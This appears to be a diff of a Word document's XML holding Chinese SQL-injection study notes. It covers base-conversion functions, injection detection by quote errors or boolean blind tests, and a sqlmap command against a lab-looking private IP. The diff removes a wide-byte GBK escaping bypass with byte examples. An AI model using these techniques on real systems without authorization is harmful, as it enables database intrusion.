+        <w:t>hex</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>等进制转换函数</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="4"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:jc w:val="center"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1413"/>
+        <w:gridCol w:w="3532"/>
+        <w:gridCol w:w="3351"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="1413" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>数据库</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3532" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>函数</w:t>
+            </w:r>
+            <w:r>
+              <w:t>或命令</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3351" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>注释</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="1413" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>MySQL</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3532" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>bin</w:t>
+            </w:r>
+            <w:r>
+              <w:t>(num)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t>oct(num)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>hex(num)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3351" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>二进制</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>八进制</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>十六</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>进制</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="1413" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>SQL Server</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3532" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3351" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC" w:themeFill="text1" w:themeFillTint="33"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+          <w:jc w:val="center"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="1413" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>Oracle</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3532" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3351" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="2"/>
       </w:pPr>
       <w:r>
@@ -26064,7 +28291,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>sqlmap</w:t>
       </w:r>
       <w:r>
@@ -26097,7 +28323,11 @@
         <w:ind w:left="840"/>
       </w:pPr>
       <w:r>
-        <w:t>D:\security\sql injection\sqlmapproject-sqlmap-04c1d43&gt;sqlmap -u "http://172.17.50.231/stage/3df71a90c48ca5f4__3/17/action.php" --data act="sd" --dbms mysql</w:t>
+        <w:t>D:\security\sql injection\sqlmapproject-sqlmap-04c1d43&gt;sqlmap -u "http://172.17.50.231/stage/3df71a90c48ca5f4__3/17/action.php" --data act="sd" --</w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>dbms mysql</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26594,87 +28824,62 @@
     <w:p/>
     <w:p>
       <w:pPr>
+        <w:ind w:leftChars="200" w:left="420"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="10"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>宽字节</w:t>
-      </w:r>
-      <w:r>
-        <w:t>绕过办法：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:leftChars="200" w:left="420"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>该</w:t>
-      </w:r>
-      <w:r>
-        <w:t>办法是利用</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>gbk</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>编码</w:t>
-      </w:r>
-      <w:r>
-        <w:t>中，部分中文</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>的</w:t>
-      </w:r>
-      <w:r>
-        <w:t>第二个字节是</w:t>
-      </w:r>
-      <w:r>
-        <w:t>’\x27’</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>，</w:t>
-      </w:r>
-      <w:r>
-        <w:t>即</w:t>
-      </w:r>
-      <w:r>
-        <w:t>’\\’</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>，</w:t>
-      </w:r>
-      <w:r>
-        <w:t>以此来让</w:t>
-      </w:r>
-      <w:r>
-        <w:t>”’”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>逃出</w:t>
+        <w:t>在</w:t>
+      </w:r>
+      <w:r>
+        <w:t>没有错误重定向时：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>打</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>报错</w:t>
+      </w:r>
+      <w:r>
+        <w:t>，或者</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">bool </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>盲注</w:t>
+      </w:r>
+      <w:r>
+        <w:t>就能说明存在</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>注入</w:t>
       </w:r>
       <w:r>
         <w:t>。</w:t>
@@ -26682,149 +28887,12 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:leftChars="200" w:left="420"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>服务</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>端代码</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>仍</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>不清楚。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:leftChars="200" w:left="420"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>錦</w:t>
-      </w:r>
-      <w:r>
-        <w:t>：</w:t>
-      </w:r>
-      <w:r>
-        <w:t>’\xe5\x27’</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:leftChars="200" w:left="420"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>誠</w:t>
-      </w:r>
-      <w:r>
-        <w:t>：</w:t>
-      </w:r>
-      <w:r>
-        <w:t>’\xd5\x27’</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:leftChars="200" w:left="420"/>
-      </w:pPr>
-      <w:r>
-        <w:t>’\xbf\x27’</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:leftChars="200" w:left="420"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="10"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>在</w:t>
-      </w:r>
-      <w:r>
-        <w:t>没有错误重定向时：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>打</w:t>
-      </w:r>
-      <w:r>
-        <w:t>’</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>报错</w:t>
-      </w:r>
-      <w:r>
-        <w:t>，或者</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">bool </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>盲注</w:t>
-      </w:r>
-      <w:r>
-        <w:t>就能说明存在</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>注入</w:t>
-      </w:r>
-      <w:r>
-        <w:t>。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="10"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>如果</w:t>
       </w:r>
       <w:r>
@@ -27104,6 +29172,92 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="0F055F5D"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="76064E76"/>
+    <w:lvl w:ilvl="0" w:tplc="0409000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="420" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="11D9761A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="43A6A4FA"/>
@@ -27189,7 +29343,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="123B0D6C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="1C22CDD8"/>
@@ -27275,7 +29429,120 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="173207A5"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="03401438"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4200" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4620" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1934257C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="CD888100"/>
@@ -27361,7 +29628,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="22C76339"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="AB186A2A"/>
@@ -27450,7 +29717,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="27A6519F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EDE0450E"/>
@@ -27539,7 +29806,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
